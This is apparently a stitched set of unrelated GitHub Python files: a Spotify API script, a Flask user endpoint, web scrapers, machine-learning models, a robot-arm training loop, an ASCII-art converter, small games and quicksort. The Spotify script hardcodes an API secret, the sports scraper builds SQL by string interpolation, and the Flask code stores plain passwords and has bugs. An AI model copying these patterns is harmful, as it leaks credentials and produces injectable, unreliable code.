# for table in gbadske_tablelist:
# print(f'> Processing table {table}')
# if 'eth' not in table: # Exclude Ethiopia-specific tables
# try:
# table_df = gbadske_import_to_pandas(table).head(100)
# except:
# table_df = pd.DataFrame({'Status':'Error reading table'} ,index=[0])
# sheetname = table.replace('population' ,'pop')
# sheetname_short = sheetname[0:31] # Sheet name must be <= 31 characters
# table_df.to_excel(writer, sheet_name=sheetname_short ,index=False)
# del table_df
# timerstop()
| GBADsInformatics/GBADsLiverpool | Global Aggregate workspace/Code and Control Files/1a_extract_from_gbadske_api.py | 1a_extract_from_gbadske_api.py | py | 17,861 | python | en | code | 0 | github-code | 50 |
17552563298 | # shows acoustic features for tracks for the given artist
from __future__ import print_function # (at top of module)
from spotipy.oauth2 import SpotifyClientCredentials
import json
import spotipy
import time
import sys
import spotipy.util as util
import spotipy.oauth2 as oauth2
CLIENT_ID = "894a0b2883b6401781728255a20a9bde"
CLIENT_SECRET = "610654fe15d44e03b683fd950cbf30af"
credentials = oauth2.SpotifyClientCredentials(
client_id=CLIENT_ID,
client_secret=CLIENT_SECRET)
token = credentials.get_access_token()
spotify = spotipy.Spotify(auth=token)
if len(sys.argv) > 1:
artist_name = ' '.join(sys.argv[1:])
else:
artist_name = 'jenn kirby'
results = spotify.search(q=artist_name, limit=2)
tids = []
for i, t in enumerate(results['tracks']['items']):
print(' ', i, t['name'])
tids.append(t['uri'])
##start = time.time()
features = spotify.audio_features(tids)
print(features)
print(features[0]['tempo'])
print(features[1]['tempo'])
##delta = time.time() - start
##for feature in features:
## print(json.dumps(feature, indent=4))
##
## analysis = spotify._get(feature['analysis_url'])
##
## print (analysis)
## print(json.dumps(analysis, indent=4))
## print()
##print("features retrieved in %.2f seconds" % (delta,))
| kilshaw/Spotify-Remixer | spotipyaudiofetures.py | spotipyaudiofetures.py | py | 1,300 | python | en | code | 0 | github-code | 50 |
34755933789 | from flask_restful import Resource, reqparse
from models.usuario import UsuarioModel
class Usuario(Resource):
def get(self, id):
usuario = UsuarioModel.find_user(id)
if usuario:
return usuario.json(), 200
return {"message": "user not found"}
def delete(self, id):
usuario = UsuarioModel.find_user(id)
if usuario:
try:
usuario.delete_user()
except:
return {"message": "An error ocurred trying to delete user"}, 500
return {"message": "User deleted"}, 200
return {"message": "Not a valid user id"}, 404
class RegistroUsuario(Resource):
def post(self):
atributos = reqparse.RequestParser()
atributos.add_arguments(
"login",
type=str,
required=True,
help="The field 'login' cannot be left blank.",
)
atributos.add_arguments(
"senha",
type=str,
required=True,
help="The field 'senha' cannot be left blank.",
)
dados = atributos.parse_args()
if UsuarioModel.find_user_by_login(dados["login"]):
return {"message": f"The login '{dados['login']}' already exists."}, 400
user = UsuarioModel(**dados)
user.save_user
return {"message": "User created successfully!"}, 201
| MagnoDutra/flask-restful-api | resources/usuario.py | usuario.py | py | 1,394 | python | en | code | 0 | github-code | 50 |
74269958875 | import re
from libs.base_client import BaseClient
from libs.common import md5
class SeHuaTang(BaseClient):
def __init__(self):
super().__init__()
self.rule = {
'start_url': 'forum.php?mod=forumdisplay&fid=103&page=%page',
'base_url': 'https://www.sehuatang.net',
'page_rule': {'list': '#threadlisttableid tbody[id^="normalthread"] a.s'},
}
self.col = None
def before_run(self):
db = self.get_db()
self.col = db.get_collection('sehuatang')
def parse_page(self, response):
doc = response.doc
alias = doc('#thread_subject').text()
r = re.search(r'([A-Z]+-[0-9]+)', alias)
if not r:
return None
alias = r.group(1)
self.logger.info(f"{response.index}/{response.total}: {alias}.")
magnet_link = doc('.blockcode li').text().strip()
if not magnet_link:
return None
data = {'alias': alias, 'magnet_link': magnet_link, 'download': 0}
self.col.update_one({'_id': md5(alias)}, {'$set': data}, True)
return data
| atzouhua/crawle | clients/av/sehuatang.py | sehuatang.py | py | 1,118 | python | en | code | 1 | github-code | 50 |
18098633302 | from sklearn import datasets
import numpy as np
from matplotlib import pyplot as plt
# 1.load sample data.
boston = datasets.load_boston()
X, y = boston.data, boston.target
m, n = np.shape(X)
y = y.reshape(m, 1)
# 2. normalize.
np.set_printoptions(precision=4)
u = np.mean(X, axis=0)
X = X - u
sigma = np.mean(X**2, axis=0)**.5
X = X / sigma
# add x0.
X = np.hstack((np.ones((m, 1)), X))
theta = (np.linalg.inv(X.T.dot(X))).dot(X.T).dot(y)
h = X.dot(theta)
J = np.sum((h-y)**2) / (2 * m)
print('the min mse is:%s\n' % J) | buptstehc/ml | lr/ne.py | ne.py | py | 526 | python | en | code | 0 | github-code | 50 |
73702222234 | import time
import datetime
from scrapy.selector import Selector
from scrapy.http import Request
from vtvspider import VTVSpider, get_nodes, extract_list_data, extract_data
import MySQLdb
INSERT_AWARD_RESULTS = 'INSERT INTO sports_awards_results (award_id, category_id, genre, location, season, result_type, participants, created_at, modified_at) VALUES ("%s", "%s", "%s", "%s", "%s", "%s", "%s", now(), now()) ON DUPLICATE KEY UPDATE participants = "%s"'
INSERT_AWARD = 'INSERT INTO sports_awards (id, award_gid, award_title, genre, created_at, modified_at) VALUES (%s, %s, %s, %s, now(), now()) ON DUPLICATE KEY UPDATE award_title = %s'
INSERT_AWARD_HIS = 'INSERT INTO sports_awards_history (award_id, award_gid, category_id, category_gid, genre, season, location, winner_nominee, participants, created_at, modified_at) VALUES ("%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", now(), now()) ON DUPLICATE KEY UPDATE participants = "%s"'
def mysql_connection():
connection = MySQLdb.connect(host = '10.4.18.183', user = 'root', db = 'SPORTSDB')
cursor = connection.cursor()
return connection, cursor
def mysql_conn():
conne = MySQLdb.connect(host = '10.4.2.187', user = 'root', db = 'AWARDS')
cursor = conne.cursor()
return conne, cursor
class HeismanTrophySpider(VTVSpider):
name = 'heisman_trophy_spider'
start_urls = ['http://espn.go.com/college-football/awards/_/id/9']
def get_award_id(self, award_title, genre):
connection, cursor = mysql_connection()
query = 'select id from sports_awards where award_title = %s'
values = (award_title)
cursor.execute(query, values)
ids = cursor.fetchone()
if ids:
aw_id = str(ids[0])
else:
query = 'select max(id) from sports_awards'
cursor.execute(query)
ids = cursor.fetchone()
if ids:
aw_id = ids[0]
aw_id = aw_id + 1
aw_gid = "AWARD" + str(aw_id)
cursor.execute(INSERT_AWARD, (aw_id, aw_gid, award_title, genre, award_title))
return aw_id, aw_gid
return aw_id
connection.close()
def get_player_id(self, player_name, game):
connection, cursor = mysql_connection()
query = 'select gid from sports_participants where title = %s and game= %s'
values = (player_name, game)
cursor.execute(query, values)
pid = cursor.fetchone()
connection.close()
if pid:
pid = str(pid[0])
return pid
def get_award_details(self, award_title):
conne, cursor = mysql_conn()
query = 'select id, award_gid from award_ceremonies where award_title = %s'
values = (award_title)
cursor.execute(query, values)
ids = cursor.fetchall()
return ids
conne.close()
def populate_sports_awards(self, player_name, award_cat, award_title, venue, season, result_type, genre, game):
aw_id = self.get_award_id(award_title, genre)
pid = self.get_player_id(player_name, game)
if aw_id and pid:
connection, cursor = mysql_connection()
cursor.execute(INSERT_AWARD_RESULTS % (aw_id, award_cat, genre, str(venue), season, result_type, pid, pid))
connection.close()
def populate_sports_history(self, player_name, award_cat, award_title, venue, season, result_type, genre, game):
pid = self.get_player_id(player_name, game)
ids = self.get_award_details(award_title)
if pid and ids:
conne, cursor = mysql_conn()
cursor.execute(INSERT_AWARD_HIS % (str(ids[0][0]), str(ids[0][1]), "", "", genre, season, str(venue),result_type, pid, pid))
conne.close()
def parse(self, response):
hxs = Selector(response)
record = {}
now = datetime.datetime.now()
tou_name = "Heisman Trophy"
game ="football"
nodes = get_nodes(hxs, '//div[@class="mod-content"]//table[@class="tablehead"]//tr[contains(@class, "row")]')
for node in nodes:
year = extract_data(node, './/td[1]//text()')
player_name = extract_data(node, './/td[2]//text()')
venue = ""
season= year
award_title = 'Heisman Trophy'
award_cat = '0'
result_type = 'winner'
genre = "football{G27}"
self.populate_sports_awards(player_name, award_cat, award_title, venue, season, result_type, genre, game)
self.populate_sports_history(player_name, award_cat, award_title, venue, season, result_type, genre, game)
| headrun/SWIFT | SPORTS/sports_spiders/scripts/dev_scripts5/heisman_spider.py | heisman_spider.py | py | 4,648 | python | en | code | 1 | github-code | 50 |
2070367749 | from omni.isaac.gym.vec_env import VecEnvBase
env = VecEnvBase(headless=True)
from franka_move_task import FrankaMoveTask
task = FrankaMoveTask(name="Franka")
env.set_task(task, backend="torch")
from stable_baselines3 import PPO
from stable_baselines3.common.callbacks import BaseCallback
from os.path import exists
import signal
import sys
timesteps = 1000000
path = "ppo_franka"
# log success rate to tensor board
class TensorBoardCallback(BaseCallback):
def __init__(self) -> None:
super(TensorBoardCallback, self).__init__()
def _on_step(self) -> bool:
# only start logging success rate after a few attempts have been made
if task.target_reached_count + task.failure_count < 20:
return True
# reset target_reached count and failure count if sum gets to high -> Accuratly display new attempts
if task.target_reached_count + task.failure_count >= 200:
task.target_reached_count = task.target_reached_count / 2
task.failure_count = task.failure_count / 2
self.logger.record('Success rate', (task.target_reached_count / (task.target_reached_count + task.failure_count)).item())
return True
# try loading old model. OnFail: create new one
if exists(path+".zip"):
model = PPO.load(path)
model.set_env(env)
model.set_parameters(path)
print("Loaded old model!", model)
else:
# create agent from stable baselines
model = PPO(
"MlpPolicy",
env,
n_steps=1024,
batch_size=1024,
n_epochs=20,
learning_rate=0.001,
gamma=0.99,
device="cuda:0",
ent_coef=0.0,
vf_coef=0.5,
max_grad_norm=1.0,
verbose=1,
tensorboard_log="./franka_tensorboard"
)
print("Created new model!")
# save and close model on interrupt
def signal_handler(sig, frame):
model.save(path)
env.close()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# learn for set amount of timesteps
for _ in range(10):
model.learn(total_timesteps=timesteps/10, callback=TensorBoardCallback(), reset_num_timesteps=False)
# save model, close simulation
model.save(path)
env.close() | Battlemech/Autonomous-Agents | franka_move/franka_train.py | franka_train.py | py | 2,264 | python | en | code | 0 | github-code | 50 |
26951848240 | import dis
def main():
a=int(input())
if a%2==0:
for i in range(0,a,2):
print(i)
else:
i=1
while i<=a:
print(i)
i+=2
#main()
dis.dis(main)
| jero98772/toma_nota | clases/lenguajes_programacion/jcoco/b.py | b.py | py | 158 | python | en | code | 0 | github-code | 50 |
32871865820 | import torch.nn as nn
class Convolution(nn.Module):
def __init__(self,c_in, c_out, k, s, p, bias=False):
super(Convolution, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(c_in,c_out,k,s,p,bias),
nn.BatchNorm2d(c_out),
nn.LeakyReLU(0.1)
)
def forward(self,x):
return self.conv(x)
class ConvResidual(nn.Module):
def __init__(self,c_in):
super(ConvResidual, self).__init__()
c = c_in // 2
self.conv = nn.Sequential(
Convolution(c_in,c,1,1,0),
Convolution(c,c_in,3,1,1)
)
def forward(self,x):
return x + self.conv(x)
class Darknet53(nn.Module):
def __init__(self):
super(Darknet53, self).__init__()
self.conv1 = Convolution(3,32,3,1,1)
self.conv2 = Convolution(32,64,3,2,1)
self.conv3_4 = ConvResidual(64)
self.conv5 = Convolution(64,128,3,2,1)
self.conv6_9 = nn.Sequential(
ConvResidual(128),
ConvResidual(128)
)
self.conv10 = Convolution(128,256,3,2,1)
self.conv11_26 = nn.Sequential(
ConvResidual(256),
ConvResidual(256),
ConvResidual(256),
ConvResidual(256),
ConvResidual(256),
ConvResidual(256),
ConvResidual(256),
ConvResidual(256)
)
self.conv27 = Convolution(256,512,3,2,1)
self.conv28_43 = nn.Sequential(
ConvResidual(512),
ConvResidual(512),
ConvResidual(512),
ConvResidual(512),
ConvResidual(512),
ConvResidual(512),
ConvResidual(512),
ConvResidual(512)
)
self.conv44 = Convolution(512,1024,3,2,1)
self.conv45_52 = nn.Sequential(
ConvResidual(1024),
ConvResidual(1024),
ConvResidual(1024),
ConvResidual(1024)
)
def forward(self,x):
conv1 = self.conv1(x)
conv2 = self.conv2(conv1)
conv3_4 = self.conv3_4(conv2)
conv5 = self.conv5(conv3_4)
conv6_9 = self.conv6_9(conv5)
conv10 = self.conv10(conv6_9)
conv11_26 = self.conv11_26(conv10)
conv27 = self.conv27(conv11_26)
conv28_43 = self.conv28_43(conv27)
conv44 = self.conv44(conv28_43)
conv45_52 = self.conv45_52(conv44)
return conv45_52, conv28_43, conv11_26
| wuxianjun666/darknet | model.py | model.py | py | 2,474 | python | en | code | 0 | github-code | 50 |
32619444210 | import cv2
import numpy
import uuid
from PIL import Image, ImageDraw, ImageFont, ImageColor
from src.utils import timer_func, convert_to_gray, IMAGE_EXTENSIONS, get_full_filename, get_rendered_filename, \
RENDERED_IMAGE_EXTENSION
pyxelart_defaults = {
'width': 128,
'height': 72,
'method': 'pyxelate',
'font_size': 20,
'asciiFont': 'Decoder',
'textColor': '#18F212',
'asciiBackground': '#000000',
'frame_step': 4,
'asciiCharSet': 'complex',
}
ASCII_TABLE_SIMPLE = " .:-=+*#%@"
ASCII_TABLE_DETAILED = " .'`^\",:;Il!i><~+_-?][}{1)(|\\/tfjrxnuvczXYUJCLQ0OZmwqpdbkhao*#MW&8%B@$"
BASE_ENCODING_TIME = 1.8
@timer_func
def get_file_details(filename):
filename = get_full_filename(filename)
if filename.rsplit('.', 1)[1].lower() in IMAGE_EXTENSIONS:
image = Image.open(filename)
file_details = {'frameRate': 1,
'width': image.width,
'height': image.height,
'frames': 1
}
else:
video = cv2.VideoCapture(filename) # says we capture an image from a webcam
frames = video.get(7)
file_details = {'frameRate': int(video.get(5)),
'width': int(video.get(3)),
'height': int(video.get(4)),
'frames': int(frames),
}
thumbnails = []
read_counter = 0
filename = str(uuid.uuid1())
while video.isOpened():
ret, cv2_im = video.read()
if not ret:
break
if read_counter % int((frames - 1) / 4) == 0:
converted = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
tn_image = Image.fromarray(converted)
tn_filename = f'{filename}-{read_counter}.{RENDERED_IMAGE_EXTENSION}'
tn_full_filename = get_full_filename(tn_filename)
tn_image.save(fp=tn_full_filename)
thumbnails.append(tn_filename)
read_counter += 1
video.release()
file_details['thumbnails'] = thumbnails
file_details.update({
'timePerFrame': BASE_ENCODING_TIME,
'initialEncodingEst': BASE_ENCODING_TIME * file_details['frames'] / 60
})
return file_details
class PyxelArt:
def __init__(self, width=128, height=72, method='pyxelate', show_original=False, file_name='', font_name='Decoder',
text_color='#18F212', bg_color='#000000', frame_step=4, show_final=True, ascii_char_set='complex'):
self.width = int(width)
self.height = int(height)
self.method = method
self.show_original = show_original
self.show_final = show_final
self.file_name = file_name
self.new_file_name = get_rendered_filename(self.file_name, self.method)
self.ascii_table = ASCII_TABLE_DETAILED if ascii_char_set == 'complex' else ASCII_TABLE_SIMPLE
self.ascii_chunks = 256 / len(self.ascii_table)
self.font_size = 20 # ToDo: change based on chunk size
self.ascii_font = ImageFont.truetype(f'fonts/{font_name}.ttf', self.font_size)
self.text_color = ImageColor.getcolor(text_color, "RGB")
self.ascii_background = ImageColor.getcolor(bg_color, "RGB")
self.frame_step = frame_step
self.image = None
self.pixels = None
self.draw = None
self.new_image = None
self.new_draw = None
# @timer_func
def chunk_image(self, console_ascii=False):
x_ratio = self.image.width / self.width
y_ratio = self.image.height / self.height
for y in range(0, self.height):
for x in range(0, self.width):
pixel_count = 0
pixel_sum = (0, 0, 0)
for y_sub in range(int(y * y_ratio), int((y + 1) * y_ratio)):
for x_sub in range(int(x * x_ratio), int((x + 1) * x_ratio)):
pt = self.pixels[x_sub, y_sub]
pixel_sum = (pixel_sum[0] + pt[0], pixel_sum[1] + pt[1], pixel_sum[2] + pt[2])
pixel_count += 1
# Pyxelate default
pixel_avg = (
int(pixel_sum[0] / pixel_count), int(pixel_sum[1] / pixel_count),
int(pixel_sum[2] / pixel_count))
if self.method in ('greyscale', 'ascii'):
grey = convert_to_gray(pixel_avg)
if self.method == 'greyscale':
pixel_avg = (grey, grey, grey)
if self.method == 'ascii':
grey_char = self.ascii_table[int(grey / self.ascii_chunks)]
if console_ascii:
print(grey_char, end='')
self.new_draw.text((int(x * x_ratio), int(y * y_ratio)), grey_char, fill=self.text_color,
font=self.ascii_font)
# Update the image for pyxelate and greyscale
if self.method != 'ascii':
for x_sub in range(int(x * x_ratio), int((x + 1) * x_ratio)):
for y_sub in range(int(y * y_ratio), int((y + 1) * y_ratio)):
self.pixels[x_sub, y_sub] = pixel_avg
if console_ascii:
print('')
if self.method == 'ascii':
self.image = self.new_image
def open_image(self):
try:
self.image = Image.open(get_full_filename(self.file_name))
self.pixels = self.image.load()
self.draw = ImageDraw.Draw(self.image)
self.new_image = Image.new(mode="RGB", size=(self.image.width, self.image.height),
color=self.ascii_background)
self.new_draw = ImageDraw.Draw(self.new_image)
except Exception as e:
print('Unable to open image file', e)
def convert_image(self):
self.open_image()
if self.image:
if self.show_original:
self.image.show()
self.chunk_image()
self.image.save(fp=get_full_filename(self.new_file_name))
if self.show_final:
self.image.show()
# @timer_func
def convert_video(self):
image_counter = 0
read_counter = 0
print('Read file: {}'.format(self.file_name))
video_in = cv2.VideoCapture(get_full_filename(self.file_name)) # ToDo: says we capture an image from a webcam
frame_rate = int(video_in.get(5))
# Below works for AVI
# video_out = cv2.VideoWriter(get_full_filename(self.new_file_name), cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),
# frame_rate, (int(video_in.get(3)), int(video_in.get(4))))
# Below works for mp4 on desktop, but not in browser to play
video_out = cv2.VideoWriter(get_full_filename(self.new_file_name), cv2.VideoWriter_fourcc(*'mp4v'), frame_rate,
(int(video_in.get(3)), int(video_in.get(4))))
print(f'Processing frame {read_counter:5d}', end='')
while video_in.isOpened():
ret, cv2_im = video_in.read()
if ret and read_counter % self.frame_step == 0:
print(f'\b\b\b\b\b{read_counter:5d}', end='')
converted = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
self.image = Image.fromarray(converted)
# ToDo: the 3 class image variables need to be set more generically in chunk process
self.pixels = self.image.load()
if self.method == 'ascii':
self.new_image = Image.new(mode="RGB", size=(self.image.width, self.image.height),
color=self.ascii_background)
self.new_draw = ImageDraw.Draw(self.new_image)
self.chunk_image()
pil_image = self.image.convert('RGB')
open_cv_image = numpy.array(pil_image)
open_cv_image = open_cv_image[:, :, ::-1].copy()
video_out.write(open_cv_image)
image_counter += 1
elif not ret:
break
read_counter += 1
video_in.release()
video_out.release()
print(f'\nsource frames={read_counter}, pyxelated frames={image_counter}')
def convert_file(self):
if self.file_name.rsplit('.', 1)[1].lower() in IMAGE_EXTENSIONS:
self.convert_image()
else:
self.convert_video()
if __name__ == '__main__':
# P = PyxelArt(file_name='static/tmp/test1.png', method="ascii") # Convert static image to ascii art
P = PyxelArt(file_name='static/tmp/test2.mp4', method="ascii") # Convert video file to ascii art
P.convert_file()
| PittCaleb/pyxelArt | src/pyxelart.py | pyxelart.py | py | 8,903 | python | en | code | 0 | github-code | 50 |
71786615194 | n = int(input())
p = list(map(int, input().split()))
p.sort()
weigh = p[0]
if weigh > 1:
print(1)
else:
for i in range(1, n):
# p에서 i번째 수를 뽑았을 때 이 수가 지금까지 뽑은 수 보다 크되, 적어도 차이가 2 이상이어야 한다.
# 만약 weigh가 20이고 뽑은게 21이면 weigh에 더할 수 있기 떄문이다.
if weigh + 1 < p[i]:
print(weigh + 1)
exit(0)
weigh += p[i]
print(weigh + 1) | JH-TT/Coding_Practice | BaekJoon/Greedy/2437.py | 2437.py | py | 492 | python | ko | code | 0 | github-code | 50 |
28826721749 | # 开发作者:crowder Zhuo
# 开发时间:2019/10/10 20:44
# 文件名称: try022
# 开发工具:Python
tour = []
height = []
hei = 100.0 # 起始高度
tim = 10 # 次数
for i in range(1, tim + 1):
# 从第二次开始,落地时的距离应该是反弹高度乘以2(弹到最高点再落下)
if i == 1:
tour.append(hei)
else:
tour.append(2 * hei)
hei /= 2
height.append(hei)
print('总高度:',sum(tour))
print('第10次反弹高度:',height[-1]) | shuai2931806756/test001 | try022.py | try022.py | py | 527 | python | zh | code | 0 | github-code | 50 |
23903709790 | #Treasures island game
print("Welcome to Treasure Island.")
print("Your mission is to find the treasure.")
#Different paths to choose
choice = input("You're at a lake house in the forest, do you go right or left?\n")
if choice == "left":
choice2 = input("You've made it to the docks, do you want to 'wait' or 'swim' across?\n").lower()
if choice2 == "wait":
choice3 = input("You've made it to the island, theres three doors a red one, blue one, and a yellow one? which one do you choose?\n").lower()
if choice3 == "red":
print ("You walked into the dragons den, Game Over")
elif choice3 == "blue":
print("You fell into a well and drowned, Game Over")
elif choice3 == "yellow":
print ("you've made it to ther safe house, !!!!YOU WON!!!!")
else:
print("That door doesn't exist, Game Over")
else:
print("The monster of the lake pulled you down, Game Over")
else:
print("The forest creatures captured you and ate you, Game Over")
#simple love game
print("Welcome to the Love Calculator!")
name1 = input("What is your name? \n")
name2 = input("What is their name? \n")
# Covnert the names to all lower case
name1 = name1.lower()
name2 = name2.lower()
#adding the names together
combined_names = name1 + name2
#Variables for the game
t = combined_names.count('t')
r = combined_names.count('r')
u = combined_names.count('u')
e = combined_names.count('e')
true = t + r + u + e
l = combined_names.count('l')
o = combined_names.count('o')
v = combined_names.count('v')
e = combined_names.count('e')
love = l + o + v + e
final_score = int(str(true) + str(love))
# Code that is going to make the game run
if (final_score < 10) or (final_score > 90):
print(f"Your score is {final_score}, you go together like coke and mentos")
elif (final_score >= 40) and final_score <= 50:
print(f"Your score is {final_score}, you are alright together.")
else:
print(f"Your score is {final_score}.")
| XavierTackett/Self_python_projects | simple_games.py | simple_games.py | py | 1,953 | python | en | code | 0 | github-code | 50 |
74381971036 | """
Quicksort: Time Complexity
Best: O(log(n))
Worst: O(n^2)
Space Complexity:
Worst: O(log(n))
4, 2, 7, 3, 1, 6
pivot = 4
"""
def quickSort(arr):
elements = len(arr) # get number of elements
# Base case
if elements < 2: # if only zero or one element return original array
return arr
pivot = 0 # Position of the partitioning element
for i in range(1, elements): # Partitioning loop
if arr[i] <= arr[0]: # compare, if new position is less than prev
pivot += 1 # swap
temp = arr[i]
arr[i] = arr[pivot]
arr[pivot] = temp
temp = arr[0]
arr[0] = arr[pivot]
arr[pivot] = temp # Brings pivot to it's appropriate position
left = quickSort(arr[0:pivot]) # Sorts the elements to the left of pivot
right = quickSort(arr[pivot + 1:elements]) # sorts the elements to the right of pivot
arr = left + [arr[pivot]] + right # Merging everything together
return arr
array_to_be_sorted = [4, 2, 7, 3, 1, 6]
print("Original Array: ", array_to_be_sorted)
print("Sorted Array: ", quickSort(array_to_be_sorted))
# output:
# Original Array: [4, 2, 7, 3, 1, 6]
# Sorted Array: [1, 2, 3, 4, 6, 7]
| lauras5/python_algs | sorting/quicksort.py | quicksort.py | py | 1,394 | python | en | code | 0 | github-code | 50 |
22117380357 | import math
STEPSIZE = 0.1 # mm/step
MAX_RPM = 500 # max motor speed
TRAVEL_SPEED = 40 # mm/sec
STEPS_PER_REV = 200
x_steps = []
y_steps = []
x_rpms = []
y_rpms = []
x = 0
y = 0
def distance_between_coords(x1, y1, x2, y2):
return math.sqrt((x2 - x1)**2 + (y2 - y1)**2)
# returns number of motor steps needed to go `dist` mm
def motor_steps_from_distance(dist):
return math.floor(dist / STEPSIZE)
def calculate_travel_time(dist):
return dist / TRAVEL_SPEED
def calculate_rpm(steps, travel_time):
if (steps == 0 or travel_time == 0):
return 0
return (steps / STEPS_PER_REV) / (travel_time / 60)
with open('swirls/flower_spiral_1.gcode') as f:
for i, next_coord in enumerate(f):
next_x, next_y = tuple([int(val.strip()) for val in next_coord.split(",")])
x_dist = next_x - x
y_dist = next_y - y
total_distance = distance_between_coords(x, y, next_x, next_y)
travel_time = calculate_travel_time(total_distance)
# print(travel_time)
x_steps.append(motor_steps_from_distance(x_dist))
y_steps.append(motor_steps_from_distance(y_dist))
x_rpms.append(round(calculate_rpm(x_steps[i], travel_time)))
y_rpms.append(round(calculate_rpm(y_steps[i], travel_time)))
x, y = next_x, next_y
steps = list(map(list, zip(x_steps, y_steps)))
rpms = list(map(list, zip(x_rpms, y_rpms)))
out = list(map(list, zip(steps, rpms)))
# print(len(rpms))
# for o in out:
# print(o)
a = []
for i in range(50):
a.append([200,0])
a.append([-200,0])
print(a)
| 3chospirits/Zen-Sand-Table--ES50-Final-Project | archive/coord_to_motor.py | coord_to_motor.py | py | 1,470 | python | en | code | 0 | github-code | 50 |
34656680824 | _author_ = 'jake'
_project_ = 'leetcode'
# https://leetcode.com/problems/maximum-depth-of-n-ary-tree/
# Given a n-ary tree, find its maximum depth.
# The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
# Recursive function. Base cases of no node or leaf node. Else add 1 to the max depth of any child.
# Time - O(n)
# Space - O(n)
class Solution(object):
def maxDepth(self, root):
"""
:type root: Node
:rtype: int
"""
if not root:
return 0
if not root.children: # required to avoid taking max of empty sequence
return 1
return 1 + max(self.maxDepth(child) for child in root.children) | jakehoare/leetcode | python_1_to_1000/559_Maximum_Depth_of_N-ary_Tree.py | 559_Maximum_Depth_of_N-ary_Tree.py | py | 736 | python | en | code | 49 | github-code | 50 |
19528465138 | import unittest
from lxml import objectify
from color_gamma_analyzer.brightness_processing import brightness_processing
class TestBrightnessProcessingMethod(unittest.TestCase):
def test_brightness_processing(self):
brightness_processing(2, "./resources/data_files/input_bp_test.xml",
"./resources/data_files/output_bp_test.xml")
file = open("./resources/data_files/output_bp_test.xml")
string_data = file.read()
file.close()
root = objectify.fromstring(string_data)
self.assertEqual(int(root.attrib['all_images']), 1)
self.assertEqual(float(root.getchildren()[0].attrib['start']), 0)
self.assertEqual(float(root.getchildren()[0].attrib['end']), 0.5)
self.assertEqual(int(root.getchildren()[0].getchildren()[0].text), 0)
self.assertEqual(float(root.getchildren()[1].attrib['start']), 0.5)
self.assertEqual(float(root.getchildren()[1].attrib['end']), 1)
self.assertEqual(int(root.getchildren()[1].getchildren()[0].text), 1)
def test_exception_from_brightness_processing(self):
brightness_processing(2, "./resources/data_files/input_bp_test.xml",
"./resources/data_files/output_bp_test.xml")
self.assertRaises(ValueError, brightness_processing, -1,
"./resources/data_files/input_bp_test.xml",
"./resources/data_files/output_bp_test.xml")
self.assertRaises(ValueError, brightness_processing, 0,
"./resources/data_files/input_bp_test.xml",
"./resources/data_files/output_bp_test.xml")
if __name__ == '__main__':
unittest.main()
| yzghurovskyi/ColorGammaAnalyzer | color_gamma_analyzer/tests/test_brightness_processing.py | test_brightness_processing.py | py | 1,724 | python | en | code | 2 | github-code | 50 |
32797968749 | import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from LP_util import get_normalized_data
from sklearn.utils import shuffle
'''
Notes added by myself as learning exercise and practice. Code by the
Lazy Programmer for Deep Learning Part 2 (Modern Deep Learning in Python).
'''
class HiddenLayer(object):
'''
Generate new hidden layer with input size and number of nodes as args.
'''
def __init__(self, M1, M2):
self.M1 = M1
self.M2 = M2
W = np.random.randn(M1, M2) * np.sqrt(2.0 / M1)
b = np.zeros(M2)
self.W = tf.Variable(W.astype(np.float32))
self.b = tf.Variable(b.astype(np.float32))
self.params = [self.W, self.b]
def forward(self, X):
'''Calculate values for next layer with ReLU activation'''
return tf.nn.relu(tf.matmul(X, self.W) + self.b)
class ANN(object):
'''
Generate new neural network, taking hidden layer sizes as a list, and
dropout rate as p_keep
'''
def __init__(self, hidden_layer_sizes, p_keep):
self.hidden_layer_sizes = hidden_layer_sizes
self.dropout_rates = p_keep
def fit(self, X, Y, Xvalid, Yvalid, lr=1e-4, mu=0.9, decay=0.9, epochs=15,
batch_sz=100, print_every=50):
'''
Takes training data and test data (valid) at once, then trains and
validates along the way. Modifying hyperparams of learning_rate, mu,
decay, epochs (iterations = N//batch_sz * epochs), batch_sz and how
often to validate and print results are passed as optional variables.
'''
X = X.astype(np.float32)
Y = Y.astype(np.int64)
Xvalid = Xvalid.astype(np.float32)
Yvalid = Yvalid.astype(np.int64)
# initialize hidden layers
N, D = X.shape
K = len(set(Y))
self.hidden_layers = []
M1 = D # first input layer is the number of features in X
for M2 in self.hidden_layer_sizes:
h = HiddenLayer(M1, M2)
self.hidden_layers.append(h)
M1 = M2 # input layer to next layer is this layer.
# output layer weights (last hidden layer to K output classes)
W = np.random.randn(M1, K) * np.sqrt(2.0 / M1)
b = np.zeros(K)
self.W = tf.Variable(W.astype(np.float32))
self.b = tf.Variable(b.astype(np.float32))
# collect params for later use, output weights are first here.
self.params = [self.W, self.b]
for h in self.hidden_layers:
self.params += h.params
# set up theano functions and variables
inputs = tf.placeholder(tf.float32, shape=(None, D), name='inputs')
labels = tf.placeholder(tf.int64, shape=(None,), name='labels')
logits = self.forward(inputs) # logits then fed in to the cost func
# softmax done within the cost function, not at the end of forward
cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=labels
)
)
'''
Unlike theano, the train_op function is not fed all of the
variable-function pairs for updating each of the weights (and caches,
momentum terms etc). Simply use a training function with the objective
specified (e.g. .minimize(cost)). The feed_dict that will be provided
to train_op are the inputs to cost (X:inputs and Y:lables))
'''
train_op = tf.train.RMSPropOptimizer(lr, decay=decay,
momentum=mu).minimize(cost)
# train_op = tf.train.MomentumOptimizer(lr, momentum=mu).minimize(cost)
# train_op = tf.train.AdamOptimizer(lr).minimize(cost)
'''
Setting up the last tensor equation placeholders to build the graphs
that will be used for computation. No values, training loop is next!
'''
prediction = self.predict(inputs) # returns labels
# validation cost will be calculated separately,
# since nothing will be dropped
test_logits = self.forward_test(inputs)
test_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=test_logits,
labels=labels
)
)
# create a session and initialize the variables within it
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
n_batches = N // batch_sz
costs = []
for i in range(epochs):
print("epoch:", i, "n_batches:", n_batches)
X, Y = shuffle(X, Y)
for j in range(n_batches):
